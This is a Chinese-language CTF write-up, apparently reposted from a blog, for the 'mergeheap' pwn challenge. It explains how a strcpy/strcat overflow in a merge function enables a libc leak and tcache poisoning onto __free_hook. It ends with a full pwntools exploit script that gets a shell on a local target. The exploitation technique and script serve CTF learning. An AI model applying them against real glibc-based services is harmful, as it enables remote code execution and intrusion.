护网 又是签到 一天
这道题一开始 不懂得如何泄露 libc 信息,就蒙了 后来群里师傅也是刚刚好 做出 到这里 我就接着做了 。
先看下保护,发现 全开了
然后 就看下流程
大概 就是添加 chunk show 合并两个chunk
可利用的 洞就是
int merge()
{
int v1; // ST1C_4
signed int i; // [rsp+8h] [rbp-18h]
int index1; // [rsp+Ch] [rbp-14h]
int index2; // [rsp+10h] [rbp-10h]
for ( i = 0; i <= 14 && ptr_array[i]; ++i )
;
if ( i > 14 )
return puts("full");
printf("idx1:");
index1 = sub_B8B();
if ( index1 < 0 || index1 > 14 || !ptr_array[index1] )
return puts("invalid");
printf("idx2:");
index2 = sub_B8B();
if ( index2 < 0 || index2 > 14 || !ptr_array[index2] )
return puts("invalid");
v1 = size_array[index1] + size_array[index2];
ptr_array[i] = malloc(v1);
strcpy((char *)ptr_array[i], (const char *)ptr_array[index1]);
strcat((char *)ptr_array[i], (const char *)ptr_array[index2]);
size_array[i] = v1;
return puts("Done");
}前面的strcpy和strcat的时候只有遇到0才停止复制 所以在merge 的时候 会有可能 把下一chunk的size 复制过来 然后溢出修改了 下一个chunk的 size
所以可以利用这点去 溢出,然后构建好payload ,然后 merge 再 free 再malloc的时候写到 一个unsortbin的pre_size 和 size 这样 在show的时候就是连带着unsortbin的fd输出了
我看 了另一个师傅的 wp
也发现了 另一种 泄露的 方面 那个简单 而且不麻烦
这个 就是 填满了 tcache 再分配了 一个unsortbin的 chunk 然后free 就是在fd 和bk上写入了main_arena 的上地址,然后 再mallo回来的时候 把前面的 fd写满 就能 泄露了
剩下就的 获取任意写的能力了 那 其实也是跟第一种 leak 的方法一样的 操作
就是 在 merge 分配到的 chunk下面有 tacahe中的 bin ,但是要在tacache中要有两个 这样可以形成链式,然后就可以修改前面的size 在free 再malloc 在malloc的时候 修改fd的内容 这样就能任意地址malloc了 再malloc 到 malloc_hook 或者 free_hook 就样就能getshell了
修改之后
malloc 一次
这下再malloc 就ok了
下面贴出 exp
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#from pwnpwnpwn import *
from pwn import *
context.log_level = 'debug'
host = "127.0.0.1"
port = 8888
r = remote(host,port)
e = ELF('./mergeheap')
libc = ELF('./libc-2.27.so')
def add(size, content):
r.recvuntil(">>")
r.sendline(str(1))
r.recvuntil("len:")
r.sendline(str(size))
r.recvuntil("content:")
r.sendline(content)
def dele(idx):
r.recvuntil(">>")
r.sendline(str(3))
r.recvuntil("idx:")
r.sendline(str(idx))
def show(idx):
r.recvuntil(">>")
r.sendline(str(2))
r.recvuntil("idx:")
r.sendline(str(idx))
def merge(idx1, idx2):
r.recvuntil(">>")
r.sendline(str(4))
r.recvuntil("idx1:")
r.sendline(str(idx1))
r.recvuntil("idx2:")
r.sendline(str(idx2))
puts_got = e.got['puts']
log.info('puts_got:0x%x'%puts_got)
add(0x30, 'a'*0x30) #0
add(0x38, 'b'*0x38) #1
add(0x100,'C'*0x10) #2
add(0x400, 'c'*0x10) #3
add(0x200, 'd'*0x10) #4
add(0x68, 'e'*0x68) #5
add(0x20,'')#6
add(0x20,'')#7
add(0x20,'')#8
add(0x20,'')#9
dele(7)
dele(8)
merge(3,4)
add(0xa8,'B'*0x68)
dele(7)
dele(5)
merge(0,1)
add(0x30,'a'*0x10)
dele(6)
add(0x100,'a'*0xff+'Q')
show(6)
r.recvuntil("Q")
leak = u64(r.recvuntil("\n",drop = True).ljust(8,'\x00'))
libc_addr = leak -0x3ebca0
log.info('libc: 0x%x'%libc_addr)
dele(6)
target = libc_addr + libc.symbols['__free_hook']-0x13
onegae = libc_addr + 0x4f322
log.info('onegae: 0x%x'%onegae)
add(0x100,'a'*0x60+p64(target)+p64(0))
add(0x20,'')
add(0x20,'a'*0x13+p64(onegae))
dele(0)
r.interactive()
来源:oschina
链接:https://my.oschina.net/u/4328601/blog/3401789